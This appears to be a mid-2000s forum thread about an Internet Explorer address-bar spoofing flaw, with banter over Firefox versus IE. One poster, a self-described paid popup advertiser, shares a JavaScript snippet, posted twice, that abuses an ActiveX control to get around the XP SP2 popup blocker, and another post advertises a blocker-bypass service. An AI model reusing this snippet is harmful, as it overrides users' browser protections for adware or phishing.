"A new vulnerability (http://secunia.com/advisories/13482/) has been announced in Internet Explorer, also affecting XP SP2, which can very easily be exploited by a malicious web site to completely spoof the address bar. The vulnerability is very similar to another vulnerability disclosed just about a year ago called the '%00' vulnerability, which also was widely exploited by phishers. A demonstration (http://secunia.com/internet_explorer_cross-site_scripting_vulnerability_test/) is also available."

any one with real sense uses firefox, Firefox needs to be added on to systems by manufacturers, IE is sooo insecure.

I hate IE... Thank God for Firefox :D

Wow thats impressive spoof.
Even the right click and view certificate shows SSL secured paypal site.

Heres another one using DHTML to bypass SP2 popup blocker :)

<SCRIPT>
if(window.navigator.userAgent.indexOf("SV1") != -1){
document.write('<object id="DHTMLSafe" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle"></object>');
DHTMLSafe.ActivateApplets = "1";
DHTMLSafe.ActivateActiveXControls = "1";

function window.open(url,target,params){
setTimeout("DHTMLSafe.DOM.Script.setTimeout(\"window.open('"+url+"','"+target+"','"+params+"');\");");
}
}
</SCRIPT>

Its a pitty the spoofers are using DHTML vulnerablity.
Now MS is going to fix it and popup bypass will not work much longer :(

Wow thats impressive spoof.
Even the right click and view certificate shows SSL secured paypal site.

Heres another one using DHTML to bypass SP2 popup blocker :)

<SCRIPT>
if(window.navigator.userAgent.indexOf("SV1") != -1){
document.write('<object id="DHTMLSafe" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle"></object>');
DHTMLSafe.ActivateApplets = "1";
DHTMLSafe.ActivateActiveXControls = "1";
setTimeout("DHTMLSafe.DOM.Script.setTimeout(\"window.open('"+url+"','"+target+"','"+params+"');\");");
}
</SCRIPT>

Its a pitty the spoofers are using DHTML vulnerablity.
Now MS is going to fix it and popup bypass will not work much longer :(


I guess you're a pop up advertiser, I do not mind banner ads but popups are beyond pointless, I read banner ads (Except annoying flashing/extremely simple question/game) but popups I close without looking at (when I used to use IE)

I guess you're a pop up advertiser, I do not mind banner ads but popups are beyond pointless, I read banner ads (Except annoying flashing/extremely simple question/game) but popups I close without looking at (when I used to use IE)

Pop up? What's that?
...
.....
.......
Oh now I remember, it was something that bugged me when I was using IE :D
But I have seen a few sites that manage to get pop ups through FireFox.

sp2 with ie, i dont see ANY popups :p :p :p

any one with real sense uses firefox, Firefox needs to be added on to systems by manufacturers, IE is sooo insecure.

I dislike this attitude. It sounds like the linux mentality or the mac mentality that says if you are using windows then you are a moron. Eh... I say let peple use what they want and don't insult their intelligence by making silly statements like the above.

I guess you're a pop up advertiser, I do not mind banner ads but popups are beyond pointless, I read banner ads (Except annoying flashing/extremely simple question/game) but popups I close without looking at (when I used to use IE)

I get paid CPM so it doesnt matter if they close them :)

faqall: i edited my message above to fix the problem of it not working.

The up and coming operating system, SkyOS (http://www.skyos.org/) has just announced the ports of Thunderbird and Firefox, both in their 1.0 stable versions. Moreover, they will be releasing a 30-page guide on how to port these two excellent Mozilla applications to alternative operating systems soon.

This is a well known sp2 bypass (DHTML), but it's already being detected by most toolbar blockers like google's. This method also does not work if the user does not have Office XP installed.

My team has technology that's worked for eccomerce sites for a while, driving normal popup windows past all the current toolbars (google, alexa, yahoo!, etc) and sp2's popup blocker. It's very advanced in that it has a solution for each webbrowser type, not just an IE exploit. Contact me for a live demo at info_@_sp2bypass_dot_com

-SP2Bypass

Nice spam!!! GAH!!!!!!

moderate.....
moderate.....
moderate.....
moderate.....
moderate.....
moderate.....